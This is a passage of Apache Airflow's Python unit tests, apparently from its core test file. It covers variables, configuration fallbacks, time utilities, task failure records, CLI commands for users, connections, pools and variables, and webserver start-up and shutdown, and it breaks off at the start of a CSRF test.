Variable.set("tested_var_set_id", value, serialize_json=True) self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True)) def test_get_non_existing_var_should_return_default(self): default_value = "some default val" self.assertEqual(default_value, Variable.get("thisIdDoesNotExist", default_var=default_value)) def test_get_non_existing_var_should_not_deserialize_json_default(self): default_value = "}{ this is a non JSON default }{" self.assertEqual(default_value, Variable.get("thisIdDoesNotExist", default_var=default_value, deserialize_json=True)) def test_variable_setdefault_round_trip(self): key = "tested_var_setdefault_1_id" value = "Monday morning breakfast in Paris" Variable.setdefault(key, value) self.assertEqual(value, Variable.get(key)) def test_variable_setdefault_round_trip_json(self): key = "tested_var_setdefault_2_id" value = {"city": 'Paris', "Hapiness": True} Variable.setdefault(key, value, deserialize_json=True) self.assertEqual(value, Variable.get(key, deserialize_json=True)) def test_variable_setdefault_existing_json(self): key = "tested_var_setdefault_2_id" value = {"city": 'Paris', "Hapiness": True} Variable.set(key, value, serialize_json=True) val = Variable.setdefault(key, value, deserialize_json=True) # Check the returned value, and the stored value are handled correctly. self.assertEqual(value, val) self.assertEqual(value, Variable.get(key, deserialize_json=True)) def test_parameterized_config_gen(self): cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG) # making sure some basic building blocks are present: self.assertIn("[core]", cfg) self.assertIn("dags_folder", cfg) self.assertIn("sql_alchemy_conn", cfg) self.assertIn("fernet_key", cfg) # making sure replacement actually happened self.assertNotIn("{AIRFLOW_HOME}", cfg) self.assertNotIn("{FERNET_KEY}", cfg) def test_config_use_original_when_original_and_fallback_are_present(self): self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY")) self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD")) FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY') configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO") FALLBACK_FERNET_KEY = configuration.conf.get( "core", "FERNET_KEY" ) self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY) # restore the conf back to the original state configuration.conf.remove_option("core", "FERNET_KEY_CMD") def test_config_throw_error_when_original_and_fallback_is_absent(self): self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY")) self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD")) FERNET_KEY = configuration.conf.get("core", "FERNET_KEY") configuration.conf.remove_option("core", "FERNET_KEY") with self.assertRaises(AirflowConfigException) as cm: configuration.conf.get("core", "FERNET_KEY") exception = str(cm.exception) message = "section/key [core/fernet_key] not found in config" self.assertEqual(message, exception) # restore the conf back to the original state configuration.conf.set("core", "FERNET_KEY", FERNET_KEY) self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY")) def test_config_override_original_when_non_empty_envvar_is_provided(self): key = "AIRFLOW__CORE__FERNET_KEY" value = "some value" self.assertNotIn(key, os.environ) os.environ[key] = value FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY') self.assertEqual(value, FERNET_KEY) # restore the envvar back to the original state del os.environ[key] def 
test_config_override_original_when_empty_envvar_is_provided(self): key = "AIRFLOW__CORE__FERNET_KEY" value = "" self.assertNotIn(key, os.environ) os.environ[key] = value FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY') self.assertEqual(value, FERNET_KEY) # restore the envvar back to the original state del os.environ[key] def test_round_time(self): rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1)) self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1) rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1)) self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2) rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime( 2015, 9, 14, 0, 0)) self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3) rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime( 2015, 9, 14, 0, 0)) self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4) rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime( 2015, 9, 14, 0, 0)) self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5) rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime( 2015, 9, 14, 0, 0)) self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6) def test_infer_time_unit(self): self.assertEqual('minutes', infer_time_unit([130, 5400, 10])) self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100])) self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000])) self.assertEqual('days', infer_time_unit([200000, 100000])) def test_scale_time_units(self): # use assert_almost_equal from numpy.testing since we are comparing # floating point arrays arr1 = scale_time_units([130, 5400, 10], 'minutes') assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3) arr2 = scale_time_units([110, 50, 10, 100], 'seconds') assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3) arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours') assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556], decimal=3) arr4 = scale_time_units([200000, 100000], 'days') assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3) def test_duplicate_dependencies(self): regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \ "already registered" with self.assertRaisesRegexp(AirflowException, regexp): self.runme_0.set_downstream(self.run_after_loop) with self.assertRaisesRegexp(AirflowException, regexp): self.run_after_loop.set_upstream(self.runme_0) def test_bad_trigger_rule(self): with self.assertRaises(AirflowException): DummyOperator( task_id='test_bad_trigger', trigger_rule="non_existent", dag=self.dag) def test_terminate_task(self): """If a task instance's db state get deleted, it should fail""" TI = models.TaskInstance dag = self.dagbag.dags.get('test_utils') task = dag.task_dict.get('sleeps_forever') ti = TI(task=task, execution_date=DEFAULT_DATE) job = jobs.LocalTaskJob( task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor()) # Running task instance asynchronously p = multiprocessing.Process(target=job.run) p.start() sleep(5) settings.engine.dispose() session = settings.Session() ti.refresh_from_db(session=session) # making sure it's actually running self.assertEqual(State.RUNNING, ti.state) ti = session.query(TI).filter_by( dag_id=task.dag_id, task_id=task.task_id, execution_date=DEFAULT_DATE ).one() # deleting the instance should result in a failure session.delete(ti) session.commit() # waiting for the async task to finish p.join() # making sure that the task ended up as failed ti.refresh_from_db(session=session) self.assertEqual(State.FAILED, ti.state) session.close() def 
test_task_fail_duration(self): """If a task fails, the duration should be recorded in TaskFail""" p = BashOperator( task_id='pass_sleepy', bash_command='sleep 3', dag=self.dag) f = BashOperator( task_id='fail_sleepy', bash_command='sleep 5', execution_timeout=timedelta(seconds=3), retry_delay=timedelta(seconds=0), dag=self.dag) session = settings.Session() try: p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) except: pass try: f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) except: pass p_fails = session.query(models.TaskFail).filter_by( task_id='pass_sleepy', dag_id=self.dag.dag_id, execution_date=DEFAULT_DATE).all() f_fails = session.query(models.TaskFail).filter_by( task_id='fail_sleepy', dag_id=self.dag.dag_id, execution_date=DEFAULT_DATE).all() print(f_fails) self.assertEqual(0, len(p_fails)) self.assertEqual(1, len(f_fails)) # C self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3) def test_dag_stats(self): """Correctly sets/dirties/cleans rows of DagStat table""" session = settings.Session() session.query(models.DagRun).delete() session.query(models.DagStat).delete() session.commit() models.DagStat.update([], session=session) self.dag_bash.create_dagrun( run_id="run1", execution_date=DEFAULT_DATE, state=State.RUNNING) models.DagStat.update([self.dag_bash.dag_id], session=session) qry = session.query(models.DagStat).all() self.assertEqual(3, len(qry)) self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id) for stats in qry: if stats.state == State.RUNNING: self.assertEqual(stats.count, 1) else: self.assertEqual(stats.count, 0) self.assertFalse(stats.dirty) self.dag_bash.create_dagrun( run_id="run2", execution_date=DEFAULT_DATE + timedelta(days=1), state=State.RUNNING) models.DagStat.update([self.dag_bash.dag_id], session=session) qry = session.query(models.DagStat).all() self.assertEqual(3, len(qry)) self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id) for stats in qry: if stats.state == State.RUNNING: self.assertEqual(stats.count, 2) else: self.assertEqual(stats.count, 0) self.assertFalse(stats.dirty) session.query(models.DagRun).first().state = State.SUCCESS session.commit() models.DagStat.update([self.dag_bash.dag_id], session=session) qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all() self.assertEqual(1, len(qry)) self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id) self.assertEqual(State.SUCCESS, qry[0].state) self.assertEqual(1, qry[0].count) self.assertFalse(qry[0].dirty) qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all() self.assertEqual(1, len(qry)) self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id) self.assertEqual(State.RUNNING, qry[0].state) self.assertEqual(1, qry[0].count) self.assertFalse(qry[0].dirty) session.query(models.DagRun).delete() session.query(models.DagStat).delete() session.commit() session.close() def test_run_command(self): if six.PY3: write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))' else: write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))' cmd = 'import sys; {0}; sys.stdout.flush()'.format(write) self.assertEqual(run_command("python -c '{0}'".format(cmd)), u'\u1000foo' if six.PY3 else 'foo') self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n') self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"') def test_trigger_dagrun_with_execution_date(self): utc_now = timezone.utcnow() run_id = 'trig__' + utc_now.isoformat() def payload_generator(context, object): object.run_id = 
run_id return object task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date', trigger_dag_id='example_bash_operator', python_callable=payload_generator, execution_date=utc_now, dag=self.dag) task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) dag_runs = models.DagRun.find(dag_id='example_bash_operator', run_id=run_id) self.assertEquals(len(dag_runs), 1) dag_run = dag_runs[0] self.assertEquals(dag_run.execution_date, utc_now) class CliTests(unittest.TestCase): @classmethod def setUpClass(cls): super(CliTests, cls).setUpClass() cls._cleanup() def setUp(self): super(CliTests, self).setUp() from airflow.www_rbac import app as application configuration.load_test_config() self.app, self.appbuilder = application.create_app(session=Session, testing=True) self.app.config['TESTING'] = True self.parser = cli.CLIFactory.get_parser() self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True) settings.configure_orm() self.session = Session def tearDown(self): self._cleanup(session=self.session) super(CliTests, self).tearDown() @staticmethod def _cleanup(session=None): if session is None: session = Session() session.query(models.Pool).delete() session.query(models.Variable).delete() session.commit() session.close() def test_cli_list_dags(self): args = self.parser.parse_args(['list_dags', '--report']) cli.list_dags(args) def test_cli_list_dag_runs(self): cli.trigger_dag(self.parser.parse_args([ 'trigger_dag', 'example_bash_operator', ])) args = self.parser.parse_args(['list_dag_runs', 'example_bash_operator', '--no_backfill']) cli.list_dag_runs(args) def test_cli_create_user_random_password(self): args = self.parser.parse_args([ 'users', '-c', '--username', 'test1', '--lastname', 'doe', '--firstname', 'jon', '--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password' ]) cli.users(args) def test_cli_create_user_supplied_password(self): args = self.parser.parse_args([ 'users', '-c', '--username', 'test2', '--lastname', 'doe', '--firstname', 'jon', '--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test' ]) cli.users(args) def test_cli_delete_user(self): args = self.parser.parse_args([ 'users', '-c', '--username', 'test3', '--lastname', 'doe', '--firstname', 'jon', '--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password' ]) cli.users(args) args = self.parser.parse_args([ 'users', '-d', '--username', 'test3', ]) cli.users(args) def test_cli_list_users(self): for i in range(0, 3): args = self.parser.parse_args([ 'users', '-c', '--username', 'user{}'.format(i), '--lastname', 'doe', '--firstname', 'jon', '--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer', '--use_random_password' ]) cli.users(args) with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.users(self.parser.parse_args(['users', '-l'])) stdout = mock_stdout.getvalue() for i in range(0, 3): self.assertIn('user{}'.format(i), stdout) def test_cli_sync_perm(self): # test whether sync_perm cli will throw exceptions or not args = self.parser.parse_args([ 'sync_perm' ]) cli.sync_perm(args) def test_cli_list_tasks(self): for dag_id in self.dagbag.dags.keys(): args = self.parser.parse_args(['list_tasks', dag_id]) cli.list_tasks(args) args = self.parser.parse_args([ 'list_tasks', 'example_bash_operator', '--tree']) cli.list_tasks(args) @mock.patch("airflow.bin.cli.db_utils.initdb") def test_cli_initdb(self, initdb_mock): cli.initdb(self.parser.parse_args(['initdb'])) initdb_mock.assert_called_once_with(False) 
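    # The resetdb test below follows the same pattern: the underlying db_utils call is
    # mocked, so only the CLI argument wiring is exercised, not the metadata database.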
@mock.patch("airflow.bin.cli.db_utils.resetdb") def test_cli_resetdb(self, resetdb_mock): cli.resetdb(self.parser.parse_args(['resetdb', '--yes'])) resetdb_mock.assert_called_once_with(False) def test_cli_connections_list(self): with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args(['connections', '--list'])) stdout = mock_stdout.getvalue() conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]] for ii, line in enumerate(stdout.split('\n')) if ii % 2 == 1] conns = [conn for conn in conns if len(conn) > 0] # Assert that some of the connections are present in the output as # expected: self.assertIn(['aws_default', 'aws'], conns) self.assertIn(['beeline_default', 'beeline'], conns) self.assertIn(['emr_default', 'emr'], conns) self.assertIn(['mssql_default', 'mssql'], conns) self.assertIn(['mysql_default', 'mysql'], conns) self.assertIn(['postgres_default', 'postgres'], conns) self.assertIn(['wasb_default', 'wasb'], conns) self.assertIn(['segment_default', 'segment'], conns) # Attempt to list connections with invalid cli args with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri', '--conn_type=fake-type', '--conn_host=fake_host', '--conn_login=fake_login', '--conn_password=fake_password', '--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra'])) stdout = mock_stdout.getvalue() # Check list attempt stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tThe following args are not compatible with the " + "--list flag: ['conn_id', 'conn_uri', 'conn_extra', " + "'conn_type', 'conn_host', 'conn_login', " + "'conn_password', 'conn_schema', 'conn_port']"), ]) def test_cli_connections_list_redirect(self): cmd = ['airflow', 'connections', '--list'] with tempfile.TemporaryFile() as fp: p = subprocess.Popen(cmd, stdout=fp) p.wait() self.assertEqual(0, p.returncode) def test_cli_connections_add_delete(self): # Add connections: uri = 'postgresql://airflow:airflow@host:5432/airflow' with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new1', '--conn_uri=%s' % uri])) cli.connections(self.parser.parse_args( ['connections', '-a', '--conn_id=new2', '--conn_uri=%s' % uri])) cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new3', '--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"])) cli.connections(self.parser.parse_args( ['connections', '-a', '--conn_id=new4', '--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"])) cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new5', '--conn_type=hive_metastore', '--conn_login=airflow', '--conn_password=airflow', '--conn_host=host', '--conn_port=9083', '--conn_schema=airflow'])) cli.connections(self.parser.parse_args( ['connections', '-a', '--conn_id=new6', '--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"])) stdout = mock_stdout.getvalue() # Check addition stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tSuccessfully added `conn_id`=new1 : " + "postgresql://airflow:airflow@host:5432/airflow"), ("\tSuccessfully added `conn_id`=new2 : " + "postgresql://airflow:airflow@host:5432/airflow"), ("\tSuccessfully added `conn_id`=new3 : " + "postgresql://airflow:airflow@host:5432/airflow"), 
("\tSuccessfully added `conn_id`=new4 : " + "postgresql://airflow:airflow@host:5432/airflow"), ("\tSuccessfully added `conn_id`=new5 : " + "hive_metastore://airflow:airflow@host:9083/airflow"), ("\tSuccessfully added `conn_id`=new6 : " + "google_cloud_platform://:@:") ]) # Attempt to add duplicate with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new1', '--conn_uri=%s' % uri])) stdout = mock_stdout.getvalue() # Check stdout for addition attempt lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ "\tA connection with `conn_id`=new1 already exists", ]) # Attempt to add without providing conn_id with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_uri=%s' % uri])) stdout = mock_stdout.getvalue() # Check stdout for addition attempt lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tThe following args are required to add a connection:" + " ['conn_id']"), ]) # Attempt to add without providing conn_uri with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new'])) stdout = mock_stdout.getvalue() # Check stdout for addition attempt lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tThe following args are required to add a connection:" + " ['conn_uri or conn_type']"), ]) # Prepare to add connections session = settings.Session() extra = {'new1': None, 'new2': None, 'new3': "{'extra': 'yes'}", 'new4': "{'extra': 'yes'}"} # Add connections for index in range(1, 6): conn_id = 'new%s' % index result = (session .query(models.Connection) .filter(models.Connection.conn_id == conn_id) .first()) result = (result.conn_id, result.conn_type, result.host, result.port, result.get_extra()) if conn_id in ['new1', 'new2', 'new3', 'new4']: self.assertEqual(result, (conn_id, 'postgres', 'host', 5432, extra[conn_id])) elif conn_id == 'new5': self.assertEqual(result, (conn_id, 'hive_metastore', 'host', 9083, None)) elif conn_id == 'new6': self.assertEqual(result, (conn_id, 'google_cloud_platform', None, None, "{'extra': 'yes'}")) # Delete connections with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new1'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new2'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new3'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new4'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new5'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new6'])) stdout = mock_stdout.getvalue() # Check deletion stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ "\tSuccessfully deleted `conn_id`=new1", "\tSuccessfully deleted `conn_id`=new2", "\tSuccessfully deleted `conn_id`=new3", "\tSuccessfully deleted `conn_id`=new4", "\tSuccessfully deleted `conn_id`=new5", "\tSuccessfully deleted `conn_id`=new6" ]) # Check deletions for index in range(1, 7): conn_id = 'new%s' % index result = (session.query(models.Connection) .filter(models.Connection.conn_id == conn_id) .first()) self.assertTrue(result is None) # Attempt to 
delete a non-existing connnection with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=fake'])) stdout = mock_stdout.getvalue() # Check deletion attempt stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ "\tDid not find a connection with `conn_id`=fake", ]) # Attempt to delete with invalid cli args with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=fake', '--conn_uri=%s' % uri, '--conn_type=fake-type'])) stdout = mock_stdout.getvalue() # Check deletion attempt stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tThe following args are not compatible with the " + "--delete flag: ['conn_uri', 'conn_type']"), ]) session.close() def test_cli_test(self): cli.test(self.parser.parse_args([ 'test', 'example_bash_operator', 'runme_0', DEFAULT_DATE.isoformat()])) cli.test(self.parser.parse_args([ 'test', 'example_bash_operator', 'runme_0', '--dry_run', DEFAULT_DATE.isoformat()])) def test_cli_test_with_params(self): cli.test(self.parser.parse_args([ 'test', 'example_passing_params_via_test_command', 'run_this', '-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()])) cli.test(self.parser.parse_args([ 'test', 'example_passing_params_via_test_command', 'also_run_this', '-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()])) def test_cli_run(self): cli.run(self.parser.parse_args([ 'run', 'example_bash_operator', 'runme_0', '-l', DEFAULT_DATE.isoformat()])) def test_task_state(self): cli.task_state(self.parser.parse_args([ 'task_state', 'example_bash_operator', 'runme_0', DEFAULT_DATE.isoformat()])) def test_dag_state(self): self.assertEqual(None, cli.dag_state(self.parser.parse_args([ 'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()]))) def test_pause(self): args = self.parser.parse_args([ 'pause', 'example_bash_operator']) cli.pause(args) self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1]) args = self.parser.parse_args([ 'unpause', 'example_bash_operator']) cli.unpause(args) self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0]) def test_subdag_clear(self): args = self.parser.parse_args([ 'clear', 'example_subdag_operator', '--no_confirm']) cli.clear(args) args = self.parser.parse_args([ 'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags']) cli.clear(args) def test_parentdag_downstream_clear(self): args = self.parser.parse_args([ 'clear', 'example_subdag_operator.section-1', '--no_confirm']) cli.clear(args) args = self.parser.parse_args([ 'clear', 'example_subdag_operator.section-1', '--no_confirm', '--exclude_parentdag']) cli.clear(args) def test_get_dags(self): dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c'])) self.assertEqual(len(dags), 1) dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c'])) self.assertGreater(len(dags), 1) with self.assertRaises(AirflowException): cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c'])) def test_backfill(self): cli.backfill(self.parser.parse_args([ 'backfill', 'example_bash_operator', '-s', DEFAULT_DATE.isoformat()])) cli.backfill(self.parser.parse_args([ 'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run', '-s', DEFAULT_DATE.isoformat()])) cli.backfill(self.parser.parse_args([ 'backfill', 'example_bash_operator', 
'--dry_run', '-s', DEFAULT_DATE.isoformat()])) cli.backfill(self.parser.parse_args([ 'backfill', 'example_bash_operator', '-l', '-s', DEFAULT_DATE.isoformat()])) def test_process_subdir_path_with_placeholder(self): self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc')) def test_trigger_dag(self): cli.trigger_dag(self.parser.parse_args([ 'trigger_dag', 'example_bash_operator', '-c', '{"foo": "bar"}'])) self.assertRaises( ValueError, cli.trigger_dag, self.parser.parse_args([ 'trigger_dag', 'example_bash_operator', '--run_id', 'trigger_dag_xxx', '-c', 'NOT JSON']) ) def test_delete_dag(self): DM = models.DagModel key = "my_dag_id" session = settings.Session() session.add(DM(dag_id=key)) session.commit() cli.delete_dag(self.parser.parse_args([ 'delete_dag', key, '--yes'])) self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0) self.assertRaises( AirflowException, cli.delete_dag, self.parser.parse_args([ 'delete_dag', 'does_not_exist_dag', '--yes']) ) def test_pool_create(self): cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test'])) self.assertEqual(self.session.query(models.Pool).count(), 1) def test_pool_get(self): cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test'])) try: cli.pool(self.parser.parse_args(['pool', '-g', 'foo'])) except Exception as e: self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e) def test_pool_delete(self): cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test'])) cli.pool(self.parser.parse_args(['pool', '-x', 'foo'])) self.assertEqual(self.session.query(models.Pool).count(), 0) def test_pool_no_args(self): try: cli.pool(self.parser.parse_args(['pool'])) except Exception as e: self.fail("The 'pool' command raised unexpectedly: %s" % e) def test_pool_import_export(self): # Create two pools first pool_config_input = { "foo": { "description": "foo_test", "slots": 1 }, "baz": { "description": "baz_test", "slots": 2 } } with open('pools_import.json', mode='w') as f: json.dump(pool_config_input, f) # Import json try: cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json'])) except Exception as e: self.fail("The 'pool -i pools_import.json' failed: %s" % e) # Export json try: cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json'])) except Exception as e: self.fail("The 'pool -e pools_export.json' failed: %s" % e) with open('pools_export.json', mode='r') as f: pool_config_output = json.load(f) self.assertEqual( pool_config_input, pool_config_output, "Input and output pool files are not same") os.remove('pools_import.json') os.remove('pools_export.json') def test_variables(self): # Checks if all subcommands are properly received cli.variables(self.parser.parse_args([ 'variables', '-s', 'foo', '{"foo":"bar"}'])) cli.variables(self.parser.parse_args([ 'variables', '-g', 'foo'])) cli.variables(self.parser.parse_args([ 'variables', '-g', 'baz', '-d', 'bar'])) cli.variables(self.parser.parse_args([ 'variables'])) cli.variables(self.parser.parse_args([ 'variables', '-x', 'bar'])) cli.variables(self.parser.parse_args([ 'variables', '-i', DEV_NULL])) cli.variables(self.parser.parse_args([ 'variables', '-e', DEV_NULL])) cli.variables(self.parser.parse_args([ 'variables', '-s', 'bar', 'original'])) # First export cli.variables(self.parser.parse_args([ 'variables', '-e', 'variables1.json'])) first_exp = open('variables1.json', 'r') cli.variables(self.parser.parse_args([ 'variables', '-s', 'bar', 'updated'])) cli.variables(self.parser.parse_args([ 
'variables', '-s', 'foo', '{"foo":"oops"}'])) cli.variables(self.parser.parse_args([ 'variables', '-x', 'foo'])) # First import cli.variables(self.parser.parse_args([ 'variables', '-i', 'variables1.json'])) self.assertEqual('original', models.Variable.get('bar')) self.assertEqual('{"foo": "bar"}', models.Variable.get('foo')) # Second export cli.variables(self.parser.parse_args([ 'variables', '-e', 'variables2.json'])) second_exp = open('variables2.json', 'r') self.assertEqual(first_exp.read(), second_exp.read()) second_exp.close() first_exp.close() # Second import cli.variables(self.parser.parse_args([ 'variables', '-i', 'variables2.json'])) self.assertEqual('original', models.Variable.get('bar')) self.assertEqual('{"foo": "bar"}', models.Variable.get('foo')) os.remove('variables1.json') os.remove('variables2.json') def _wait_pidfile(self, pidfile): while True: try: with open(pidfile) as f: return int(f.read()) except: sleep(1) def test_cli_webserver_foreground(self): # Confirm that webserver hasn't been launched. # pgrep returns exit status 1 if no process matched. self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) # Run webserver in foreground and terminate it. p = subprocess.Popen(["airflow", "webserver"]) p.terminate() p.wait() # Assert that no process remains. self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) @unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]), "Skipping test due to lack of required file permission") def test_cli_webserver_foreground_with_pid(self): # Run webserver in foreground with --pid option pidfile = tempfile.mkstemp()[1] p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile]) # Check the file specified by --pid option exists self._wait_pidfile(pidfile) # Terminate webserver p.terminate() p.wait() @unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]), "Skipping test due to lack of required file permission") def test_cli_webserver_background(self): import psutil # Confirm that webserver hasn't been launched. self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) # Run webserver in background. subprocess.Popen(["airflow", "webserver", "-D"]) pidfile = cli.setup_locations("webserver")[0] self._wait_pidfile(pidfile) # Assert that gunicorn and its monitor are launched. self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) # Terminate monitor process. pidfile = cli.setup_locations("webserver-monitor")[0] pid = self._wait_pidfile(pidfile) p = psutil.Process(pid) p.terminate() p.wait() # Assert that no process remains. 
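        # (pgrep -c exits with status 1 when nothing matches, so an exit code of 1 here
        # means the airflow/gunicorn processes are gone.)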
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) # Patch for causing webserver timeout @mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0) def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _): # Shorten timeout so that this test doesn't take too long time configuration.conf.set("webserver", "web_server_master_timeout", "10") args = self.parser.parse_args(['webserver']) with self.assertRaises(SystemExit) as e: cli.webserver(args) self.assertEqual(e.exception.code, 1) class SecurityTests(unittest.TestCase): def setUp(self): configuration.load_test_config() configuration.conf.set("webserver", "authenticate", "False") configuration.conf.set("webserver", "expose_config", "True") app = application.create_app() app.config['TESTING'] = True self.app = app.test_client() self.dagbag = models.DagBag( dag_folder=DEV_NULL, include_examples=True) self.dag_bash = self.dagbag.dags['example_bash_operator'] self.runme_0 = self.dag_bash.get_task('runme_0') def get_csrf(self, response): tree = html.fromstring(response.data) form = tree.find('.//form') return form.find('.//input[@name="_csrf_token"]').value def test_csrf_rejection(self): endpoints = ([ "/admin/queryview/", 